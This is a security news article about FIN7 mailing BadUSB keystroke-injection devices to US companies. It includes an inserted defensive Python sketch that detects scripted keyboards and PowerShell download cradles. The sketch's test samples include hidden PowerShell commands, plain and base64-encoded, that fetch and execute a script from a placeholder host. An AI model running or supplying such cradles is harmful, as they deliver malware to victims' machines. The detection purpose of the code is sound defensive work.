FIN7 hackers sent BadUSB devices to American companies

The FBI warns that in recent months the FIN7 hacking group has been mailing BadUSB devices to American companies in the hope of infecting their systems and gaining an initial foothold for further attacks.

FIN7 is known, among other things, for its links to the DarkSide and BlackMatter ransomware operations.

Since August 2021 the FBI has received reports of several packages containing such USB devices, sent to US transportation, insurance and defence companies. The parcels were shipped via the United States Postal Service (USPS) and United Parcel Service (UPS), the FBI said.

The packages come in two variants. Some mimic correspondence from the US Department of Health and Human Services (HHS): they are accompanied by a letter with links to COVID-19 protection guidance and instruct the recipient to consult the attached USB stick. Others imitate an Amazon gift box and contain a fake thank-you letter, a fake gift card and a USB device. Both variants are known to contain LilyGO-branded USB devices.

According to law enforcement, when a victim plugs such a device into a PC it carries out a BadUSB attack: the device presents itself over USB as a Human Interface Device (HID), i.e. it registers as a keyboard, and then injects a series of pre-programmed keystrokes into the user's machine. Because the operating system trusts any keyboard, no software vulnerability has to be exploited and autorun protections do not help.

These keystrokes launch PowerShell commands that download and install malware acting as a backdoor. In the cases investigated by the FBI, the group then obtained administrative access and moved laterally to other systems on the network.
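As an added example (not code from the original article or from the FBI alert), the following Python sketch shows two checks a defender can run against the chain just described: one flags a keyboard whose keystroke cadence is too fast and too regular to be a person, the other scores PowerShell command lines for the download-cradle shape those keystrokes produce, decoding a -EncodedCommand payload before scoring. Device paths, command lines and all thresholds are constructed assumptions for this example.

```python
"""Heuristics for the two BadUSB stages described above: a keyboard that types
like a microcontroller, and the PowerShell download cradle it types.
All device paths, command lines and thresholds are constructed for this example."""
import base64
import re
import statistics
from dataclasses import dataclass


@dataclass(frozen=True)
class KeyEvent:
    device: str  # Windows-style device instance path of the keyboard (constructed)
    t_ms: int    # key-down timestamp in milliseconds


def intervals_by_device(events):
    """Inter-key intervals (ms) per keyboard device, in time order."""
    times = {}
    for ev in events:
        times.setdefault(ev.device, []).append(ev.t_ms)
    for ts in times.values():
        ts.sort()
    return {dev: [b - a for a, b in zip(ts, ts[1:])] for dev, ts in times.items()}


def flag_injecting_devices(events, min_keys=20, max_mean_ms=50.0, max_stdev_ms=20.0):
    """Devices whose cadence looks scripted: many keys, tiny and near-constant gaps.

    Thresholds are assumptions to tune per fleet. A person produces bursts with
    roughly 150-400 ms between keys and a wide spread; a board replaying a stored
    payload emits dozens of keys a few milliseconds apart with almost no jitter.
    """
    flagged = set()
    for dev, gaps in intervals_by_device(events).items():
        if len(gaps) + 1 < min_keys:
            continue
        if statistics.fmean(gaps) <= max_mean_ms and statistics.pstdev(gaps) <= max_stdev_ms:
            flagged.add(dev)
    return flagged


# Indicator name -> regex applied to a command line and to any decoded -EncodedCommand.
CRADLE_INDICATORS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    "hidden_window": re.compile(r"(?i)-w(?:i|in|indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "policy_bypass": re.compile(r"(?i)-e(?:p|x|xec|xecutionpolicy)\s+bypass"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                           r"net\.webclient|start-bitstransfer"),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
}
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def cradle_indicators(cmdline):
    """Sorted names of indicators hit by the command line or its decoded payload."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    return sorted(name for name, rx in CRADLE_INDICATORS.items()
                  if any(rx.search(t) for t in texts))


def is_download_cradle(cmdline, min_hits=2):
    """Alert on two or more independent indicators (threshold is an assumption)."""
    return len(cradle_indicators(cmdline)) >= min_hits


def encode_command(script):
    """Build the -EncodedCommand form PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# ---- constructed sample input (not real telemetry) ----
HUMAN_KEYBOARD = r"HID\VID_046D&PID_C31C&MI_00\7&1a2b3c4d&0&0000"  # hypothetical desktop keyboard
ROGUE_KEYBOARD = r"HID\VID_DEAD&PID_BEEF&MI_00\8&5e6f7a8b&0&0000"  # hypothetical plugged-in board


def sample_events():
    events, t = [], 0
    for gap in [180, 240, 95, 310, 150, 420, 210, 130] * 4:  # 32 human-paced keys
        t += gap
        events.append(KeyEvent(HUMAN_KEYBOARD, t))
    t = 5000
    for i in range(60):                                      # 60 keys 8-10 ms apart: a replayed payload
        t += 8 + i % 3
        events.append(KeyEvent(ROGUE_KEYBOARD, t))
    return events


CRADLE = ("powershell -w hidden -nop -ep bypass -c "
          "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"")
BENIGN = 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'
ENCODED = "powershell.exe -w hidden -enc " + encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')")

if __name__ == "__main__":
    print("scripted keyboards:", flag_injecting_devices(sample_events()))
    for cmd in (BENIGN, CRADLE, ENCODED):
        print(is_download_cradle(cmd), cradle_indicators(cmd))
```

The cadence check needs an allowlist before it is useful: barcode scanners and some KVMs are HID keyboards that also type fast and evenly, so pair the flag with the device instance path and the time it was first seen. The cradle check belongs on process-creation telemetry that includes the command line (Windows Security event 4688 with command-line auditing, or Sysmon event 1) and on PowerShell script-block logs, where the decoded payload is already visible.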

FIN7 operators used a variety of tools, including Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER and TIRION, and deployed ransomware including BlackMatter and REvil on compromised networks.

Let me remind you that this is not the first such case. In 2020, Trustwave researchers reported that an unnamed US hospitality company received a fake Best Buy gift card in the mail together with a malicious USB flash drive. The accompanying letter said the drive had to be plugged into a computer to view the list of items the gift card could be spent on.

Let me remind you that we have written before that FIN7's main activity is stealing companies' financial records (including payment card data) and gaining access to the financial data and computers of finance-department employees in order to steal funds, and that when hackers from all over the world attacked Microsoft SharePoint servers, traces of the well-known FIN7 were noticed.

Daniel Zimmermann

Daniel Zimmermann has been writing on security and malware subjects for many years and has been working in the security industry for over 10 years. Daniel was educated at the Saarland University in Saarbrücken, Germany and currently lives in New York.
